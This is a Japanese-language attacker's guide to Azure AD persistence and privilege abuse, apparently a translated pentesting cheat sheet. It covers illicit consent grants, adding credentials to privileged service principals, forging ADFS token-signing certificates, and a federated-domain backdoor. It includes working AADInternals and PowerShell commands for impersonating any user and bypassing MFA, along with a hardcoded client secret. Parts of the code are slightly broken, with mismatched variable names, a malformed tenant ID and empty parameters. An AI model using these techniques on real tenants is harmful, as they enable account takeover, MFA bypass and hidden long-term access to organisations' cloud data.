不正な同意付与

デフォルトでは、任意のユーザーがAzure ADでアプリケーションを登録できます。したがって、管理者権限で高い影響を持つアプリケーション（ユーザーの代わりにメールを送信する、ロール管理など）を登録できます（管理者であれば承認することができます）。これにより、フィッシング攻撃を実行でき、成功した場合には非常に有益になります。

さらに、そのアプリケーションを自分のユーザーとして受け入れることで、アクセスを維持する方法もあります。

アプリケーションとサービス プリンシパル

Application Administrator、GA、またはmicrosoft.directory/applications/credentials/update権限を持つカスタムロールで、既存のアプリケーションに資格情報（シークレットまたは証明書）を追加できます。

高い権限を持つアプリケーションをターゲットにするか、高い権限を持つ新しいアプリケーションを追加することが可能です。

アプリケーションに追加する興味深いロールは特権認証管理者ロールであり、これによりグローバル管理者のパスワードをリセットできます。

このテクニックはまた、MFAをバイパスすることも可能です。

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a

• 証明書ベースの認証

```powershell Connect-AzAccount -ServicePrincipal -Tenant -CertificateThumbprint -ApplicationId ``` ### フェデレーション - トークン署名証明書

オンプレミスAD で DA権限 を持っている場合、非常に長い有効期間を持つ 新しいトークン署名 および トークン復号証明書 を作成およびインポートすることが可能です。これにより、私たちは ImuutableID を知っている任意のユーザーとして ログイン することができます。

以下のコマンドを ADFSサーバー上のDA として実行して、新しい証明書を作成し（デフォルトパスワードは 'AADInternals'）、それらをADFSに追加し、自動ロールオーバーを無効にしてサービスを再起動します：

New-AADIntADFSSelfSignedCertificates

次に、Azure ADで証明書情報を更新します:

Update-AADIntADFSFederationSettings -Domain cyberranges.io

フェデレーション - 信頼されたドメイン

テナントでGA権限を持っている場合、新しいドメインを追加することが可能です（検証する必要があります）。認証タイプをフェデレーテッドに構成し、ドメインを特定の証明書（以下のコマンドのany.sts）と発行者に信頼させることができます。

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

参考

• https://aadinternalsbackdoor.azurewebsites.net/